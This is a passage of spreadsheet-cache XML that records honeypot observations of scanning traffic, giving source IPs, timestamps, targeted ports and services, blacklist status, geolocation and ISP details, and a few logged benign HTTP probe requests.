    <s v="{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;NA&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', 'method': 'GET', 'uri': '/rest/applinks/1.0/manifest'}}&amp;&amp;{Data_REDIS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c2bb:b0ac"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <s v="Redis Scan"/>
  </r>
  <r>
    <x v="1057"/>
    <x v="1057"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:56:23"/>
    <d v="2024-08-28T20:40:33"/>
    <d v="2025-04-23T10:56:23"/>
    <n v="37"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H28&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;34133&amp;&amp;38048&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.2088"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Communication Ltd"/>
    <s v="2008-09-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f4:eb86"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1058"/>
    <x v="1058"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:43:45"/>
    <d v="2025-03-31T17:44:05"/>
    <d v="2025-04-23T10:43:45"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.5355"/>
    <s v="77.391"/>
    <s v="133647"/>
    <s v="ELXIRE DATA SERVICES PVT. LTD."/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="business"/>
    <s v="Cify IT Services Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af6f:b663"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1059"/>
    <x v="1059"/>
    <s v="syn-172-074-006-199.res.spectrum.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:12:17"/>
    <d v="2025-02-26T04:10:15"/>
    <d v="2025-04-23T10:12:17"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NC"/>
    <s v="North Carolina"/>
    <s v="Wilson"/>
    <s v="Wilson"/>
    <s v="4499389"/>
    <s v="27893"/>
    <s v="35.7213"/>
    <s v="-77.9155"/>
    <s v="11426"/>
    <s v="Charter Communications Inc"/>
    <s v="Charter Communications Inc"/>
    <s v="business"/>
    <s v="Spectrum"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac4a:6c7"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1060"/>
    <x v="1060"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:09:14"/>
    <d v="2025-04-23T10:07:43"/>
    <d v="2025-04-23T10:09:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f8:ae65"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1061"/>
    <x v="1061"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:05:29"/>
    <d v="2024-12-20T21:48:24"/>
    <d v="2025-04-23T10:05:29"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:5da0"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1062"/>
    <x v="1062"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:03:34"/>
    <d v="2024-06-14T16:14:59"/>
    <d v="2025-04-23T10:03:34"/>
    <n v="71"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MYSQL_H2&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;55401&amp;&amp;445&amp;&amp;1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Selatan"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.23278"/>
    <s v="106.845"/>
    <s v="58369"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="PT. Fiber Networks Indonesia"/>
    <s v="residential"/>
    <s v="PT Patra Badak Arun Solusi"/>
    <s v="2023-11-13"/>
    <s v="IDNIC-PBAS-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,50931)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,51549)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,54582)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,55213)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,58657)}&amp;&amp;{Data_SMB:Incoming connection (115.187.30.154,59076)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bb:1e9a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="Scanning attempt"/>
  </r>
  <r>
    <x v="1063"/>
    <x v="1063"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T10:02:56"/>
    <d v="2025-04-23T10:02:56"/>
    <d v="2025-04-23T10:02:56"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:48ad"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1064"/>
    <x v="1064"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:57:57"/>
    <d v="2025-04-23T09:57:57"/>
    <d v="2025-04-23T09:57:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7361:85ab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1065"/>
    <x v="1065"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:53:02"/>
    <d v="2025-04-23T09:51:27"/>
    <d v="2025-04-23T09:53:02"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.19504"/>
    <s v="106.821"/>
    <s v="17995"/>
    <s v="PT iForte Global Internet"/>
    <s v="PT iForte Global Internet"/>
    <s v="business"/>
    <s v="Iforte"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679e:a3b1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1066"/>
    <x v="1066"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:50:54"/>
    <d v="2025-04-23T09:48:43"/>
    <d v="2025-04-23T09:50:54"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:1bad"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1067"/>
    <x v="1067"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:49:00"/>
    <d v="2025-03-28T18:41:00"/>
    <d v="2025-04-23T09:49:00"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BG"/>
    <s v="Bulgaria"/>
    <s v="09"/>
    <s v="Kardzhali"/>
    <s v="Kardzhali"/>
    <s v="Kardzhali"/>
    <s v="729794"/>
    <s v="6600"/>
    <s v="41.65"/>
    <s v="25.3667"/>
    <s v="13124"/>
    <s v="A1 Bulgaria EAD"/>
    <s v="A1 Bulgaria EAD"/>
    <s v="business"/>
    <s v="A1 BG"/>
    <s v="2008-10-10"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3edd:94f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1068"/>
    <x v="1068"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:25:10"/>
    <d v="2025-04-23T09:25:10"/>
    <d v="2025-04-23T09:25:10"/>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d4:f68c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1069"/>
    <x v="1069"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:10:47"/>
    <d v="2025-02-17T12:12:41"/>
    <d v="2025-04-23T09:10:47"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="48"/>
    <s v="Gyeongsangnam-do"/>
    <s v="Jinju-si"/>
    <s v="Jinju-si (Jinnyangho-ro)"/>
    <s v="1846050"/>
    <s v="52691"/>
    <s v="35.1826"/>
    <s v="128.071"/>
    <s v="9694"/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="Seokyung Cable Television Co.. Ltd."/>
    <s v="business"/>
    <s v="Scsnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7c99:92cb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1070"/>
    <x v="1070"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:05:08"/>
    <d v="2024-11-25T08:03:16"/>
    <d v="2025-04-23T09:05:08"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="LA"/>
    <s v="Lampung"/>
    <s v="Kota Metro"/>
    <s v="Metro"/>
    <s v="1635283"/>
    <s v="NA"/>
    <s v="-5.11306"/>
    <s v="105.307"/>
    <s v="150266"/>
    <s v="PT Inhqi Media Infotek"/>
    <s v="PT Inhqi Media Infotek"/>
    <s v="business"/>
    <s v="Inhqi"/>
    <s v="2023-06-12"/>
    <s v="INHQI-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.218.183.226,53790)}&amp;&amp;{Data_SMB:Incoming connection (103.218.183.226,54951)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67da:b7e2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1071"/>
    <x v="1071"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T09:02:50"/>
    <d v="2025-04-23T09:02:50"/>
    <d v="2025-04-23T09:02:50"/>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3b5c:acf8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1072"/>
    <x v="1072"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T08:52:54"/>
    <d v="2024-06-01T03:53:00"/>
    <d v="2025-04-23T08:52:54"/>
    <n v="65"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;21244&amp;&amp;1433&amp;&amp;52764&amp;&amp;445&amp;&amp;3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="LA"/>
    <s v="Laos"/>
    <s v="VT"/>
    <s v="Vientiane Prefecture"/>
    <s v="NA"/>
    <s v="Vientiane"/>
    <s v="1651944"/>
    <s v="NA"/>
    <s v="17.9726"/>
    <s v="102.599"/>
    <s v="137905"/>
    <s v="Mangkone Technology Co. Ltd."/>
    <s v="Mangkone Technology Co. Ltd."/>
    <s v="business"/>
    <s v="Mangkone Technology Co. Ltd"/>
    <s v="2018-04-27"/>
    <s v="REVO-LA"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,49294)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,50277)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,64747)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,65110)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,62705)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,59563)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,59860)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,51878)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,52185)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,56274)}&amp;&amp;{Data_SMB:Incoming connection (103.114.146.142,56573)}&amp;&amp;{Data_SMB:Incoming connection 